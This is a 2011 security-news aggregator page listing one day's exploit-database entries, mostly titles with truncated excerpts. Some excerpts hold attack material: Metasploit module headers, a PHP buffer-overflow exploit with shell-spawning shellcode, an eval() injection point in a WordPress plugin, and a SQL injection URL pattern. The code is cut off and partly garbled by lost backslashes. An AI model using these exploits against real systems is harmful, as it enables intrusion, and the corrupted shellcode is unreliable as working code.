Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for May 28th, 2011

[webapps / 0day] – Profshop (cms_display.php)<= Blind SQL Injection Vulnerability


[webapps / 0day] – Web File Browser 0.4b14 => File[Shell]upload / Information Disclosure


[remote exploits] – 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer Stack Overflow

##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
[...]


[webapps / 0day] – Whitetail Quest <= SQL Injection Vulnerability


[webapps / 0day] – XMS Systems <= SQL Injection Vulnerability


[webapps / 0day] – Wordpress Plugin Is-human <=1.4.2 Remote Command Execution

# Exploit Title: is-human (1.4.2 and prior) WordPress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the ‘type’ parameter,
when the ‘action’ is set to log-reset. From here we can run our own code.
In [...]


[webapps / 0day] – InHouse CMS <= SQL Injection Vulnerability


[webapps / 0day] – 99ko <= 0.4b Multiple (CSRF/XSRF) Vulnerabilities


[webapps / 0day] – Trade Line Web <= Remote (id) Funcs SQL-i Vulnerabilities

Trade Line Web <= Remote ‘id’ Funcs SQL-i Vulnerabilities

[webapps / 0day] – Zen Cart <= v1.3.9h Multiple Vulnerabilities

[*]==================================================================>
[*]
[*] Multiple Vulnerabilities in Zen Cart
[*]
[*] [ Vendor SW ] => Zen Cart – http://www.zen-cart.com
[*] [ Version ] => 1.3.9f, 1.3.9h (but possibly all versions)
[*] [ Vendor URL ] => www.zen-cart.com
[*] [ Tested on [...]


[webapps / 0day] – vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability


[webapps / 0day] – werkform (index.php) <= SQL Injection Vulnerability


[webapps / 0day] – xtcModified <= 1.05 (FCKeditor) Multiple Vulnerabilities


[webapps / 0day] – Homepages Admin (index.php) => Auth Bypass Vulnerability


[webapps / 0day] – Ciphertek Systems (snapshots/detail) => SQL Injection Vulnerability


[local exploits] – PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go…n";
define(‘EVIL_SPACE_ADDR’, "xffxffxeexb3");
define(‘EVIL_SPACE_SIZE’, 1024*1024*8);
$SHELLCODE =
"x6ax31×58×99xcdx80×89xc3×89xc1×6ax46×58xcdx80xb0".
"x0bx52×68×6ex2fx73×68×68×2fx2fx62×69×89xe3×89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, [...]


[webapps / 0day] – AWStats Totals =< v1.14 multisort Remote Command Execution

##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
[...]


[webapps / 0day] – cPanel < 11.25 CSRF – Add User php Script

# Exploit Title: cPanel < 11.25 CSRF – Add php script
# Date: 27.05.2011
# Author: ninjashell
# Software Link: http://cpanel.net
# Version: 11.25 (see details below)
# Tested on: Linux
# CVE : N/A
I. Introduction
cPanel versions below and excluding 11.25 are vulnerable to CSRF, which
leads to uploading a PHP script of the attacker's liking. If you have turned
off security [...]


[dos / poc] – Poison Ivy 2.3.2 Remote Buffer Overflow

# Exploit Title: Poison Ivy 2.3.2 (Latest version) remote buffer overflow
# Google Dork: No dorks.
# Date: 27/05/11
# Author: Kevin R.V <kevin.nullbyte@gmail.com>
# Software Link: http://www.poisonivy-rat.com/dl.php?file=PI232
# Version: 2.3.2
# Tested on: Windows XP SP2
# CVE : No exist.
/* Poison Ivy 2.3.2 Remote Buffer Overflow
* Author: Kevin R.V <kevin.nullbyte@gmail.com>
* Date: 2011
* [...]


[webapps / 0day] – Duhok Forum 1.1 SQL Injection Vulnerability

# Exploit Title: DuhokForum <= 1.1 (index.php) SQL Injection Vulnerability
# Date: 28-05-2011
# Author: M.Jock3R
# Vendor or Software Link: http://www.duhoktimes.com/df/?file=duhokforum-1.1
# Version: 1.1
# Category:: webapps
# Google dork: duhokFrm 1.1 © Dilovan 2007 – 2008
# Tested on: windows XP Sp2 FR
# Demo site: http://forum2009.eb2a.com/index.php?mode=f&f=1′
Exploit:
http:localhost/duhokfrm/index.php?modd=[Inj3ct Here ]
===================================================================
Greets To :
Adelsbm / attiadona / Wjforum
mail : madrido.jocker@gmail.com
THANKS TO ALL ALGERIAN [...]
